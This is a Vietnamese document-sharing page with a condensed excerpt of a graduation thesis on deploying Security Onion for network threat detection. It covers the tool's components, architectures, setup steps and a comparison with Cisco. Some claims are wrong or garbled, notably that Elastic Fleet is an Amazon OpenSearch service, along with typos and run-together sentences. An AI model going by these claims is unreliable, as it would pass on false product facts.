1. Trang chủ
  2. » Giáo Dục - Đào Tạo

Đồ Án tốt nghiệp nghiên cứu xây dựng giải pháp phát hiện và săn tìm mối Đe dọa an ninh mạng dựa trên công nghệ security onion

92 2 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Nghiên cứu xây dựng giải pháp phát hiện và săn tìm mối đe dọa an ninh mạng dựa trên công nghệ Security Onion
Tác giả Nguyễn Huy Hoàng
Người hướng dẫn ThS. Trần Quang Kỳ
Trường học Học viện Kỹ thuật mật mã
Chuyên ngành An toàn thông tin
Thể loại đồ án tốt nghiệp
Năm xuất bản 2024
Thành phố TP. HCM
Định dạng
Số trang 92
Dung lượng 4,15 MB

Cấu trúc

  • 2. Lịch sử hình thành (35)
  • 3. Thành phần cốt lõi (36)
    • 3.1 Giám sát hệ thống mạng (36)
      • 3.1.1 Phát hiện xâm nhập (36)
      • 3.1.2 Network Metadata (36)
    • 3.3 Các công cụ phân tích (41)
      • 3.3.1 Giao diện SOC (41)
      • 3.3.2 Kibana (42)
      • 3.3.3 Elastic Fleet (43)
      • 3.3.4 Osquery Fleet (43)
      • 3.3.5 InfluxDB (44)
      • 3.3.6 Hunt (45)
      • 3.3.7 CyberChef (46)
      • 3.3.8 CAPME (47)
      • 3.3.9 Squert (48)
      • 3.3.10 Sguil (49)
      • 3.3.11 Wireshark (50)
      • 3.3.12 Các công cụ NIDS (50)
    • 3.4 Yêu cầu hạ tầng (52)
    • 3.5 Kiến Trúc (54)
      • 3.5.1 Import (54)
      • 3.5.2 Evaluation (54)
      • 3.5.3 Standalone (55)
      • 3.5.4 Distributed (56)
      • 3.5.5 Note Types (58)
        • 3.5.5.1 Manager node (58)
        • 3.5.5.2 Search nodes (58)
        • 3.5.5.3 Forward Node (58)
        • 3.5.5.4 Heavy node (59)
    • 3.6 Triển khai Security Onions (59)
      • 3.6.1 Setup Security Onion (61)
    • 3.7 So sánh Security Onion và Cisco Systems (70)
      • 3.7.1 Đánh giá chung giữa Cisco Systems và Security Onion (70)
      • 3.7.2 Đánh giá nổi bật của khách hàng (72)
    • 3.8 Ưu điểm và nhược điểm của Security Onion (73)
      • 3.8.1 Ưu điểm (73)
      • 3.8.2 Nhược điểm (74)
  • CHƯƠNG 3: ỨNG DỤNG CỦA SECURITY ONION TRONG VIỆC SĂN TÌM MỐI ĐE DỌA TIỀM ẨN (76)
    • 2.1 Malware (77)
      • 2.1.1 Kịch bản (77)
      • 2.1.2 Mục tiêu (78)
      • 2.1.3 Thực hiện tấn công (78)
    • 2.2 Phishing Attack (82)
      • 2.2.1 Kịch bản (82)
      • 2.2.2 Demo quá trình tấn công (82)
  • TÀI LIỆU THAM KHẢO (92)

Nội dung

DANH MỤC HÌNH VẼHình 1.1 Xu hướng gia tăng các cuộc xâm nhập từ Q3 2022 - Q2-2024 của CrowTrike Hình 1.2 Top các lĩnh vực bị xâm nhập từ Q3 2023-Q2 2024 của CrowTrike Hình 1.3 Tỷ lệ phươ

Lịch sử hình thành

Vào năm 2008, Doug Burks đã phát triển Security Onion, một bản phân phối Linux chuyên dụng cho việc phát hiện xâm nhập, giám sát an ninh mạng và quản lý log.

Vào năm 2012, Security Onion đã thực hiện một cuộc tái cấu trúc lớn, được gọi là "Big Distro Rebuild", nhằm nâng cao hiệu suất, tối ưu hóa kiến trúc và tích hợp tốt hơn với các công cụ an ninh mạng hiện đại.

Vào năm 2014, khi cộng đồng Security Onion toàn cầu phát triển mạnh mẽ, Doug Burks nhận được nhiều yêu cầu về đào tạo và dịch vụ chuyên nghiệp Để đáp ứng nhu cầu này, Doug đã thành lập Security Onion Solutions LLC, nhằm hỗ trợ người dùng Security Onion khám phá sâu hơn các lớp bảo mật trong mạng của họ.

Vào năm 2018, chúng tôi đã kỷ niệm 10 năm phát triển của Security Onion bằng cách ra mắt các thiết bị phần cứng tùy chỉnh Những thiết bị này cung cấp giải pháp phần cứng tối ưu, được cấu hình sẵn, giúp người dùng triển khai nhanh chóng và dễ dàng hơn trong việc giám sát và bảo mật mạng.

Năm 2020, Security Onion 2 ra mắt với nhiều cải tiến vượt bậc, bao gồm thiết kế lại hoàn toàn và giao diện web mới, mang đến trải nghiệm người dùng trực quan và dễ quản lý hơn.

Năm 2022 Những tính năng quan trọng

Lịch sử hình thành và phát triển của Security Onion Console (SOC) đã được giới thiệu với các thành phần chính như Cases (Trường hợp), Dashboards (Bảng điều khiển), Analyzers (Trình phân tích) và nhiều tính năng khác, nhằm nâng cao hiệu quả trong việc quản lý, phân tích và xử lý các mối đe dọa.

Năm 2024, Security Onion Solutions kỷ niệm 10 năm thành lập với việc ra mắt module Detections mới và phiên bản Security Onion Pro, được thiết kế đặc biệt cho doanh nghiệp và tổ chức chính phủ Phiên bản này cung cấp các tính năng nâng cao cùng với hỗ trợ chuyên nghiệp, đáp ứng nhu cầu bảo mật ngày càng cao.

Thành phần cốt lõi

Giám sát hệ thống mạng

Security Onion tạo ra cảnh báo NIDS bằng cách giám sát lưu lượng mạng và tìm kiếm các dấu vân tay cụ thể phù hợp với lưu lượng mạng độc hại hoặc nghi ngờ Phương pháp này dựa trên chữ ký, tương tự như chữ ký virus, nhưng có độ sâu và linh hoạt hơn Các cảnh báo NIDS được tạo ra bởi Suricata.

Khác với phương pháp phát hiện xâm nhập dựa trên chữ ký, Network Metadata cung cấp nhật ký kết nối và các giao thức chuẩn như DNS, HTTP, FTP, SMTP, SSH và SSL Siêu dữ liệu mạng mang lại cái nhìn sâu sắc về bối cảnh dữ liệu và các sự kiện trên mạng, giúp bạn hiểu rõ hơn về các kết nối, lưu lượng giữa các hệ thống và cách sử dụng các giao thức trong môi trường của bạn Điều này không chỉ cung cấp thông tin về tình hình hiện tại mà còn hỗ trợ phát hiện hành vi bất thường hoặc sự kiện đáng ngờ khi kết hợp với các cảnh báo NIDS.

Security Onion cung cấp siêu dữ liệu mạng thông qua Zeek hoặc Suricata Zeek, một công cụ phân tích lưu lượng mạng mạnh mẽ, theo dõi và ghi lại các giao thức như HTTP, DNS, và FTP, giúp bạn hiểu rõ cách các hệ thống tương tác trong mạng Trong khi đó, Suricata không chỉ phát hiện xâm nhập mà còn ghi lại thông tin lưu lượng mạng, hỗ trợ thu thập siêu dữ liệu Sử dụng Zeek hoặc Suricata, Security Onion mang lại cái nhìn chi tiết về mạng, hỗ trợ phát hiện mối đe dọa và phân tích sự kiện, giúp phát hiện sự cố nhanh chóng và chính xác hơn.

Bắt tất cả gói tin (Full Packet Capture) được thực hiện thông qua công cụ Stenographer, hỗ trợ ghi lại các gói dữ liệu đệm lên ổ đĩa nhằm phát hiện xâm nhập và giúp quản trị viên có phản ứng kịp thời Stenographer cung cấp cơ chế ghi và đọc gói tin từ card mạng (NIC-to-disk packet writing) và xử lý ngoại lệ khi ổ đĩa hết dung lượng bằng cách xóa bớt gói tin Công cụ này cũng cho phép đọc lại các gói tin cụ thể một cách nhanh chóng và sử dụng AP-PACKET để gửi và nhận gói tin.

Security Onion bao gồm tùy chọn node Intrusion Detection Honeypot (IDH),cho phép bạn thiết lập một nút mô phỏng các dịch vụ phổ biến như HTTP, FTP và

SSH Bất kỳ tương tác nào với các dịch vụ giả mạo này sẽ tự động kích hoạt cảnh báo.

Theo cuốn sách Intrusion Detection Honeypots (tác giả Sanders, C):

Intrusion Detection Honeypot (IDH) là một công cụ bảo mật quan trọng trong mạng nội bộ, giúp phát hiện và cảnh báo khi có hoạt động thăm dò hoặc tấn công Bằng cách sử dụng kỹ thuật đánh lừa, IDH thu hút kẻ tấn công để chúng tương tác với hệ thống, trong khi hệ thống âm thầm ghi lại thông tin và gửi cảnh báo Khi có sự xâm nhập, bạn có thể nhanh chóng bắt đầu điều tra để bảo vệ mạng lưới của mình.

Security Onion không chỉ giám sát mạng mà còn cung cấp khả năng giám sát điểm cuối thông qua Elastic Agent, cho phép thu thập dữ liệu từ các thiết bị đầu cuối và thực hiện truy vấn thời gian thực với osquery Điều này giúp đội ngũ bảo mật có cái nhìn sâu sắc về hoạt động của các thiết bị, từ đó phát hiện và phản ứng nhanh chóng với các mối đe dọa Đối với các thiết bị mạng như tường lửa và bộ định tuyến không hỗ trợ cài đặt agent, Security Onion vẫn có khả năng thu thập và xử lý dữ liệu nhật ký qua giao thức Syslog, đảm bảo quản lý hiệu quả ngay cả với những thiết bị không tích hợp trực tiếp.

Phát hiện mạng và các điểm cuối là quá trình phân tích lưu lượng gói tin trong mạng hoặc hệ thống máy chủ, cung cấp dữ liệu nhật ký và cảnh báo cho các sự kiện và hoạt động được phát hiện Security Onion mang đến nhiều tùy chọn để hỗ trợ việc này.

Hình 2.3 Minh họa phát hiện tấn công trên cơ sở hệ thống mạng (NIDS)

NIDS hướng theo quy tắc (Rule-driven NIDS) sử dụng Suricata trong Security Onion 2 để phát hiện xâm nhập mạng thông qua 9 quy tắc, phân tích lưu lượng mạng nhằm tìm dấu vân tay và số nhận dạng của lưu lượng độc hại hoặc đáng ngờ Đối với NIDS hướng phân tích (analysis-driven network intrusion detection), Security Onion cung cấp Zeek, công cụ giám sát hoạt động mạng, ghi lại mọi kết nối, yêu cầu DNS, và hoạt động của nhiều dịch vụ mạng như HTTP, FTP, và SSL, mang lại cái nhìn toàn diện về dữ liệu và sự kiện trong môi trường mạng Zeek cũng có khả năng kiểm tra tổng MD5 cho các tải xuống tệp HTTP và cung cấp các giải pháp mở rộng để phân tích dữ liệu mạng trong thời gian thực Khung đầu vào của Zeek cho phép cung cấp dữ liệu và so sánh các hoạt động trong mạng, đồng thời cho phép phân tích dữ liệu độc lập về giao thức, giúp bắt dữ liệu và chuyển chúng vào môi trường sandbox hoặc file chia sẻ kiểm tra vi-rút.

Hình 2.4 Minh họa phát hiện tấn công dựa trên cơ sở hệ thống máy chủ/đầu cuối (HIDS)

Các công cụ phân tích

Hình 2.5 Giao diện của SOC

Giao diện Dashboards của Security Onion Console (SOC) cung cấp cái nhìn tổng quan toàn diện về hệ thống, hiển thị các cảnh báo từ hệ thống phát hiện xâm nhập mạng (NIDS) và nhật ký siêu dữ liệu mạng từ Zeek hoặc Suricata, cùng với các loại nhật ký khác mà bạn đang thu thập.

Hình 2.6 Giao diện của Kibana

Kibana, được phát triển bởi nhóm Elastic, cho phép phân tích nhanh chóng và trực quan hóa dữ liệu từ Security Onion thông qua một giao diện duy nhất Nó tích hợp không chỉ cảnh báo từ NIDS/HIDS mà còn bao gồm nhật ký từ Zeek và hệ thống, thu thập qua các phương thức khác nhau Người dùng có thể dễ dàng truy cập và phân tích toàn bộ gói dữ liệu thông qua Security Onion Console (SOC).

Hình 2.7 Giao diện của Elastic Fleet

Elastic Fleet là dịch vụ của Amazon OpenSearch Service, cho phép quản lý và mở rộng cụm OpenSearch mà không cần cấu hình hay quản lý máy chủ Thay vì dựa vào các node cố định, Elastic Fleet sử dụng tài nguyên điện toán linh hoạt, tự động điều chỉnh để đáp ứng nhu cầu truy cập và xử lý dữ liệu theo thời gian thực.

Hình 2.8 Giao diện của Osquery Fleet

Hình 2.9 Giao diện của InfluxDB

InfluxDB là nền tảng mã nguồn mở chuyên xử lý và lưu trữ dữ liệu theo thời gian, cung cấp API mạnh mẽ cho phép người dùng lưu trữ và truy vấn dữ liệu hiệu quả Nền tảng này hỗ trợ các tác vụ ETL, giám sát hệ thống và cảnh báo sự cố, đồng thời cung cấp bảng điều khiển người dùng để quản lý và trực quan hóa dữ liệu theo thời gian thực InfluxDB giúp phân tích và hiển thị dữ liệu một cách sinh động, cho phép người dùng khám phá và hiểu rõ các xu hướng, sự kiện và hoạt động trong hệ thống.

Hình 2.10 Giao diện của Hunt

Hunt mang lại độ chính xác và tập trung cao hơn so với các truy vấn tổng quan trong Dashboards Khác với Dashboards, nơi mà mỗi trường dữ liệu được hiển thị trong bảng riêng biệt, nhiều truy vấn mặc định trong Hunt tổng hợp nhiều trường dữ liệu vào cùng một bảng, giúp người dùng dễ dàng phát hiện các hoạt động khó nhận biết hơn.

Hình 2.11 Giao diện của CyberChef

CyberChef là công cụ mã nguồn mở do GCHQ phát triển, được mệnh danh là "Swiss Army Knife for Cyber Operations" nhờ tính linh hoạt vượt trội Ứng dụng web này có giao diện kéo thả trực quan, giúp người dùng dễ dàng thực hiện các tác vụ như mã hóa/giải mã, phân tích hash, chuyển đổi định dạng và lọc log CyberChef rất hữu ích trong phân tích log an ninh, giải mã thông tin mã hóa, phát hiện malware và xử lý dữ liệu mạng Với khả năng tự triển khai, công cụ này đảm bảo tính riêng tư và bảo mật cho người dùng.

Hình 2.12 Giao diện của CAPME

Hình 2.13 Giao diện của Squert

Squert là một ứng dụng web cho phép người dùng thực hiện các truy vấn và xem xét các sự kiện từ log thu thập trong cơ sở dữ liệu của Sguil, đặc biệt là các cảnh báo từ hệ thống phát hiện xâm nhập (IDS).

- Xem một bản dịch pcap transcript được render bằng tcpflow

- Xem một bản dịch pcap transcript được render bằng Zeek

Hình 2.14 Giao diện của Sguil

Sguil là một phần mềm mã nguồn mở dành cho giám sát an ninh mạng (NSM) do Bamm Visscher phát triển Phần mềm này được sử dụng để theo dõi an toàn mạng và phân tích các sự kiện dựa trên cảnh báo từ hệ thống phát hiện xâm nhập (IDS).

Sguil client được viết bằng ngôn ngữ Tcl/Tk và có thể hoạt động trên mọi hệ điều hành hỗ trợ ngôn ngữ đó

Hình 2.15 Giao diện của WireShark

WhiteShark là ứng dụng giúp người dùng theo dõi và phân tích mạng theo thời gian thực, sử dụng các giao thức phổ biến như TCP, UDP, HTTP, HTTPS và nhiều giao thức khác.

Các công cụ NIDS (Network Intrusion Detection System) là những giải pháp giám sát và phát hiện xâm nhập mạng, có chức năng phát hiện các hành động đáng ngờ và cảnh báo người dùng dựa trên các quy tắc đã được cấu hình Trong Security Onion, người dùng có thể lựa chọn Snort hoặc Suricata làm engine NIDS Khi cài đặt ở chế độ Evaluation Mode, Security Onion sẽ tự động sử dụng Snort làm engine NIDS, trong khi ở các chế độ cài đặt khác, Suricata thường được thiết lập mặc định với chế độ AF_PACKET.

- Các cảnh báo do NIDS phát hiện có thể được phân tích chi tiết hơn bằng các công cụ như Squert, Kibana, và Sguil.

- Các lệnh chuyển đổi IDS engine

+ Từ Snort chuyển sang Suricata sudo so-sensor-stop sudo sed -i's|ENGINE=snort|ENGINE=suricata|g'

/etc/nsm/securityonion.conf sudo rule-update sudo so-sensor-start

+ Từ Suricata sang Snort sudo so-sensor-stop sudo sed -i's|ENGINE=suricata|ENGINE=snort|g'

/etc/nsm/securityonion.conf sudo rule-update sudo so-sensor-start

- Chuyển đổi IDS engine trong môi trường phân tán sử dụng Salt:

+ Để chuyển từ Snort sang Suricata trong môi trường phân tán với Salt, thực hiện như sau: sudo so-sensor-stop sudo sed -i 's|ENGINE=snort|ENGINE=suricata|g'

/etc/nsm/securityonion.conf sudo rule-update sudo so-sensor-start

To update the Security Onion sensor configuration, execute the following commands: first, stop the sensor using `sudo salt '*securityonionsensor*' cmd.run 'so-sensor-stop'` Next, modify the configuration file to switch from Snort to Suricata with `sudo salt '*securityonionsensor*' cmd.run 'sed -i "s|ENGINE=snort|ENGINE=suricata|g" /etc/nsm/securityonion.conf'` After making the changes, apply the highstate with `sudo salt '*securityonionsensor*' state.highstate`, and finally, restart the sensor using `sudo salt '*securityonionsensor*' cmd.run 'so-sensor-start'`.

Các công cụ hỗ trợ phân tích điểm cuối (Host Visibility)

Security Onion có khả năng thu thập và phân tích bản ghi từ các điểm cuối trong mạng thông qua nhiều công cụ hữu ích Một trong những công cụ nổi bật là Wazuh, một HIDS mã nguồn mở miễn phí cho Windows, Linux và Mac OS X, cho phép quản trị viên theo dõi từ điểm cuối đến điểm thoát Wazuh thực hiện các chức năng quan trọng như phân tích bản ghi, kiểm tra tính toàn vẹn của file, giám sát theo chính sách, phát hiện rootkit, cung cấp cảnh báo thời gian thực và phản hồi chủ động Ngoài Wazuh, Security Onion còn hỗ trợ nhiều công cụ khác như Elastic Beats, Sysmon, Autoruns và Syslog để nâng cao khả năng bảo mật mạng.

Yêu cầu hạ tầng

- Security Onion chỉ hỗ trợ CPU có kiến trúc x86-64

- Các yêu cầu kỹ thuật tối thiểu (Nếu chỉ sử dụng import pcap, cài đặt Security Onion 2 như một import node):

+ 200GB không gian lưu trữ

- Với tất cả các case sử dụng, yêu cầu tối thiểu để chạy Security Onion 2 là: + 12GB RAM

+ 200GB không gian lưu trữ

Để sử dụng Elastic Stack, hệ thống cần tối thiểu 4 core CPU và 8GB RAM Yêu cầu này sẽ tăng lên khi người quản trị giám sát và thu thập nhiều lưu lượng mạng cũng như nhiều bản ghi (log) hơn.

Để bảo vệ cơ sở dữ liệu của Security Onion trong quá trình giám sát mạng, việc sử dụng UPS (bộ lưu điện) là cần thiết nhằm tránh tình trạng shutdown thiết bị không mong muốn.

Để giám sát môi trường mạng hiệu quả, NIC cần ít nhất một kết nối có dây với địa chỉ IP tĩnh Mặc dù kết nối không dây có thể được sử dụng, nhưng hiệu suất sẽ không được đảm bảo, vì Security Onion được tối ưu hóa cho kết nối có dây.

Security Onion cần ít nhất một giao diện mạng để thực hiện việc sniffing, kết nối với PAT hoặc cổng SPAN Giao diện mạng này nên là một thiết bị riêng biệt nhằm tránh xung đột phần cứng trong máy Security Onion Ngoài ra, giao diện mạng ảo hóa cũng có thể được sử dụng, nhưng cần lưu ý đến việc cân bằng phân bố tài nguyên để đảm bảo hệ thống hoạt động ổn định.

Phân vùng không gian lưu trữ:

Nếu sử dụng Security Onion từ file ISO image, việc phân vùng không gian lưu trữ đã được thực hiện trước

/nsm: hầu hết dữ liệu sẽ được ghi vào

/nms, nên dành ra ít nhất 100GB cho vùng lưu trữ này

/: vùng root chứa /var/lib/docker/, cần ít nhất 100GB

/tmp: ít nhất 2GB swap: vùng nhớ được sử dụng thay cho RAM trong một số trường hợp, nên đặt dung lượng ít nhất 8GB

Hình 2.16 Yêu cầu về phần cứng của các dạng cấu trúc của Security Onion

Khi triển khai SO dưới kiến trúc Standalone, tất cả các thành phần quản lý và cảm biến hoạt động trên một máy duy nhất, yêu cầu tối thiểu về phần cứng là 16GB RAM, CPU 4 Cores và 200GB ổ đĩa lưu trữ Để hệ thống hoạt động hiệu quả nhất, nên trang bị 24GB RAM, và tùy thuộc vào lưu lượng mạng cần theo dõi, có thể cần cấu hình phần cứng cao hơn.

Kiến Trúc

Kiến trúc cơ bản nhất trong hệ thống là Import node, đây là một máy độc lập duy nhất có khả năng xử lý tất cả các thành phần cần thiết để nhập các tệp pcap hoặc evtx qua trang Grid Import node không hỗ trợ thêm các Elastic agents hoặc các nút Security Onion khác Để tìm hiểu thêm về cách sử dụng tùy chọn Import, hãy tham khảo tài liệu chi tiết.

Hình 2.17 Kiến trúc cơ bản của kiến trúc Import.

Kiến trúc Evaluation là một bước tiến phức tạp hơn so với Import, với giao diện mạng chuyên dụng để theo dõi lưu lượng mạng từ cổng TAP hoặc cổng span Các quy trình giám sát lưu lượng trên giao diện này sẽ tạo ra các bản ghi, mà Elastic Agent thu thập và gửi trực tiếp đến Elasticsearch để phân tích và lập chỉ mục Chế độ Evaluation được thiết kế để cài đặt nhanh chóng cho việc thử nghiệm tạm thời Security Onion, nhưng không phù hợp cho môi trường sản xuất và không hỗ trợ thêm Elastic agents hay các nút Security Onion bổ sung.

Hình 2.18 Mô tả kiến trúc cơ bản của kiến trúc Eval 3.5.3 Standalone

Standalone tương tự như Evaluation khi tất cả các thành phần hoạt động trên một máy duy nhất Tuy nhiên, khác với Elastic Agent gửi bản ghi trực tiếp đến Elasticsearch, nó chuyển bản ghi đến Logstash trước, sau đó gửi đến Redis để xếp hàng Một pipeline Logstash thứ hai sẽ lấy các bản ghi từ Redis và gửi đến Elasticsearch để phân tích và lập chỉ mục.

Loại triển khai này chủ yếu được áp dụng cho các mục đích như kiểm tra, phòng thí nghiệm, POC hoặc trong các môi trường có lưu lượng thấp Tuy nhiên, nó không thể mở rộng như các triển khai phân tán.

Hình 2.19 Mô tả kiến trúc cơ bản của kiến trúc Standalone

Một triển khai Standard distributed bao gồm một manager node, nhiều forward nodes với các thành phần cảm biến mạng, và nhiều search nodes với các thành phần Elasticsearch Mặc dù chi phí ban đầu có thể cao hơn, kiến trúc này mang lại khả năng mở rộng và hiệu suất tốt hơn, cho phép bạn dễ dàng thêm nút để xử lý lưu lượng hoặc nguồn nhật ký tăng lên.

Hình 2.20 Mô tả kiến trúc cơ bản của kiến trúc Distributed

The manager node operates the Security Onion Console (SOC) and Kibana, featuring its own local version of Elasticsearch Primarily, it is utilized for managing the Elasticsearch cluster as search nodes join The supervisor connects to the manager node from a workstation, such as Security Onion Desktop, to perform queries and retrieve data.

Một manager node chuyên dụng cần có các search nodes chuyên dụng đi kèm Để bắt đầu, manager node phải đảm nhận vai trò data node Sau khi thêm một search node riêng biệt, bạn có thể chuyển dữ liệu từ manager sang search node và sau đó loại bỏ vai trò data node khỏi manager.

Nút quản lý chạy các thành phần sau:

• Bảng điều khiển Security Onion (SOC)

Các search nodes lấy bản ghi từ hàng đợi Redis trên manager node, sau đó tiến hành phân tích và lập chỉ mục các bản ghi này Khi người dùng thực hiện truy vấn trên manager node, nó sẽ truy vấn các search nodes, và các search nodes sẽ trả về kết quả tìm kiếm.

Khi sử dụng forward node, các thành phần của Elastic Stack không cần được cài đặt Filebeat sẽ chuyển tiếp tất cả các log đến Logstash trên manager node, nơi dữ liệu được lưu trữ trong Elasticsearch trên manager node hoặc một search node Dữ liệu sau đó có thể được truy vấn thông qua tìm kiếm nhiều cụm Forward node bao gồm các thành phần như Zeek, Suricata, Stenographer và Wazuh.

Heavy node, tương tự như search node, mở rộng khả năng lưu trữ và xử lý cho các manager node, nhưng đồng thời cũng thực hiện các nhiệm vụ của cảm biến, dẫn đến hiệu suất tổng thể thấp hơn Các thành phần mà heavy node chạy bao gồm Elasticsearch, Logstash, Curator, Zeek, Suricata và Stenographer.

Triển khai Security Onions

- Tải file ISO từ trang chủ của Security Onion https://github.com/Security-Onion-Solutions/securityonion/blob/

1cef75d6d3894d28beb4ad9268f9c97ffb40ded7/

DOWNLOAD_AND_VERIFY_ISO.md

- Chuẩn bị tài nguyên máy ảo Vmware

Hình 2.21 Chuẩn bị hạ tầng phần cứng cho SO

Sau khi Setup hoàn tất phần cứng từ RAM , CPU , Hard disk 1 tiếp theo chọn

VM Options , tích vào ô “The next time the virtual machine boots, force entry into BIOS setup screen”.

Hình 2.22 Mô tả chuẩn bị hạ tầng cho SO (2)

Chọn vào “Install Security Onion 2.4.110”

Nhập “ Yes “ để tiếp tục tiến trình cài đặt , tiếp theo nhập vào username password để đăng ký tài khoản lên SO.

Chọn “ Yes “ để bắt đầu tiến trình cài đặt cài đặt

Chọn vào “Install run the standard Security Onion installation”

- Chọn vào kiểu triển khai mà bạn chọn để triển khai , trong trường hợp này chọn “Standalone”

- Chọn vào “Standard This node has access to the Internet”

- Nhập tên máy chủ Security Onion

Để chọn giao diện đầu tiên làm NIC quản lý, hãy nhấn phím cách để làm nổi bật tùy chọn này, sau đó nhấn 'Enter' để xác nhận lựa chọn của bạn.

- Nhập địa chỉ Ipv4 cho card mạng quản trị của Security Onion.

- Nhập tên DNS của bạn.

- Chọn vào “Direct” vào chọn “OK”

To access the web management interface of Security Onion, enter the Management Network using CIDR notation, allowing devices on that network to connect seamlessly.

Nhập địa chỉ email của bạn, vì nó sẽ được sử dụng làm tên người dùng cho tài khoản đăng nhập vào bảng điều khiển của Security Onion.

- Bảng cuối cùng tóm tắt tất cả các tùy chọn bạn đã cấu hình và cho phép bạn chọn chấp nhận những cấu hình này và tiếp tục

Sau khi các tiến trình hoàn tất, hãy truy cập vào địa chỉ quản trị của Security Onion tại https://192.168.20.95 và đăng nhập bằng địa chỉ email đã đăng ký.

So sánh Security Onion và Cisco Systems

3.7.1 Đánh giá chung giữa Cisco Systems và Security Onion

Hình 2.40 Đánh giá trung bình của 2 sản phẩm Cisco Systems và SecurityOnion theo đánh giá của Gartner

Hình 2.41 Đánh giá về điểm tổng thể của 2 sản phẩm Cisco Systems và Security Onion theo đánh giá của Gartner

Hình 2.42 Đánh giá trung bình về Evaluation và Contracting của Cisco Systems và Security Onion theo đánh giá của Gartner

Hình 2.43 Đánh giá về khả năng tích hợp và triển khai của 2 sản phẩm của Cisco Systems và Security Onion theo đánh giá của Gartner

Hình 2.44 Đánh giá về khả hỗ trợ dịch vụ của 2 sản phẩm Cisco System vàSecurity Onion theo đánh giá của Gartner

3.7.2 Đánh giá nổi bật của khách hàng

Cisco Firepower - IDS IPS Security Onion

Chúng tôi đã triển khai Cisco Firepower nhằm nâng cao khả năng giám sát các mối đe dọa mạng trong hệ thống Trước khi quyết định mua, bạn có thể tìm hiểu chi tiết về thiết kế và tính năng sản phẩm trên trang web của Cisco cũng như từ cộng đồng người dùng rộng rãi Quá trình cài đặt sản phẩm này rất đơn giản và dễ dàng thực hiện.

Cisco Firepower cung cấp nhiều tùy chọn để bạn tùy chỉnh hệ thống phát hiện và ngăn chặn xâm nhập (IDS/IPS)”

“Phần mềm miễn phí hỗ trợ phát triển tùy chỉnh”

Phần mềm này hoàn toàn miễn phí và hoạt động hiệu quả mà không phát sinh chi phí Khi mua giờ hỗ trợ, bạn sẽ nhận được sự trợ giúp trong việc cài đặt và khắc phục sự cố, cũng như phát triển tính năng tùy chỉnh Đội ngũ hỗ trợ và phát triển luôn nhiệt tình và chuyên nghiệp.

Cisco Secure Firewall là một sản phẩm cũ

Giao diện hiện tại đã trở nên lỗi thời, chậm chạp và khó sử dụng, cần được cải thiện để trở nên trực quan và dễ dàng hơn cho cả các kỹ sư mạng chuyên nghiệp.

Security Onion là mã nguồn mở và tiết kiệm chi phí, tuy nhiên, nó đòi hỏi phải tùy chỉnh khá nhiều.

Chúng tôi đã thiết lập một phòng thí nghiệm demo giám sát môi trường ICS bằng Security Onion, một công cụ mã nguồn mở mạnh mẽ Tuy nhiên, để đạt hiệu quả tối ưu, công cụ này cần nhiều tùy chỉnh và hỗ trợ.

Bảng 1.1 Bảng so sánh nhận xét của người dùng về Cisco System và

Security Onion (SO) là giải pháp mã nguồn mở toàn diện cho việc giám sát và bảo vệ hạ tầng mạng, lý tưởng cho các tổ chức cần linh hoạt trong điều chỉnh và mở rộng Với tính năng thu thập và phân tích log, giám sát lưu lượng mạng, và phát hiện xâm nhập, SO cho phép theo dõi tình trạng an ninh mạng một cách liên tục và chủ động Khả năng tùy chỉnh cao của Security Onion giúp người dùng điều chỉnh cấu hình và công cụ theo nhu cầu cụ thể của môi trường mạng.

Security Onion là phần mềm mã nguồn mở, giúp doanh nghiệp tiết kiệm chi phí bản quyền và cho phép tự do kiểm tra, sửa đổi cũng như phát triển các tính năng mới Điều này làm cho Security Onion trở thành lựa chọn lý tưởng cho các tổ chức có đội ngũ IT nội bộ mạnh, cần một giải pháp linh hoạt và tùy biến cao.

Security Onion nổi bật với sự kết hợp giữa tính linh hoạt, mã nguồn mở và công cụ mạnh mẽ cho giám sát, phát hiện và phản ứng với mối đe dọa mạng Đây là giải pháp tối ưu cho các tổ chức vừa và nhỏ, đặc biệt tại thị trường Việt Nam, nơi chi phí phần mềm và khả năng tùy chỉnh được ưu tiên hàng đầu.

Ưu điểm và nhược điểm của Security Onion

Security Onion là nền tảng SIEM mã nguồn mở miễn phí, giúp tổ chức tiết kiệm chi phí cho hệ thống giám sát và quản lý an ninh mạng Nền tảng này tích hợp các công cụ mạnh mẽ như Suricata, Zeek (Bro), Elasticsearch, Kibana, và TheHive, mang lại khả năng giám sát, phát hiện và xử lý mối đe dọa bảo mật một cách toàn diện.

Security Onion cung cấp khả năng tùy chỉnh linh hoạt, cho phép người dùng điều chỉnh và mở rộng hệ thống theo nhu cầu cụ thể của tổ chức Tính năng này rất quan trọng cho các môi trường bảo mật, nơi mà cấu hình linh hoạt là cần thiết để đáp ứng các yêu cầu bảo mật đa dạng.

Security Onion tích hợp các công cụ mạnh mẽ như Suricata, Zeek (Bro), Elasticsearch, Kibana và TheHive, xây dựng một hệ sinh thái bảo mật toàn diện Hệ thống này hỗ trợ hiệu quả trong việc phát hiện mối đe dọa, giám sát mạng và xử lý sự cố bảo mật.

Thị trường Việt Nam vẫn còn nhiều tiềm năng phát triển trong lĩnh vực SIEM, khi nhiều công ty chưa đầu tư vào hạ tầng này do chi phí cao Security Onion, với ưu điểm là mã nguồn mở, miễn phí và khả năng tùy chỉnh linh hoạt, là giải pháp lý tưởng giúp doanh nghiệp tiết kiệm chi phí mà vẫn nâng cao hiệu quả giám sát và bảo mật mạng.

Giám sát thời gian thực của Security Onion cho phép doanh nghiệp theo dõi mạng và hệ thống một cách liên tục, giúp phát hiện và giảm thiểu các mối đe dọa an ninh mạng kịp thời Điều này rất quan trọng trong việc đánh giá tác động của threat Intelligence đối với hệ thống mạng của doanh nghiệp.

Việc triển khai Security Onion 2, đặc biệt với các thành phần như Elasticsearch, Logstash và Kibana, đòi hỏi hạ tầng phần cứng mạnh mẽ, bao gồm CPU, RAM và dung lượng lưu trữ Điều này tạo ra thách thức lớn cho các doanh nghiệp vừa và nhỏ có ngân sách và cơ sở hạ tầng hạn chế.

Phức tạp trong việc quản lý và triển khai :

Triển khai Security Onion 2 là một quá trình phức tạp, yêu cầu người quản trị hệ thống phải có kiến thức vững về hệ điều hành Linux, hạ tầng mạng và các thành phần trong hệ sinh thái ELK (Elasticsearch, Logstash, Kibana) Để vận hành Security Onion hiệu quả, người quản lý cũng cần có hiểu biết sâu sắc về bảo mật các giao thức mạng.

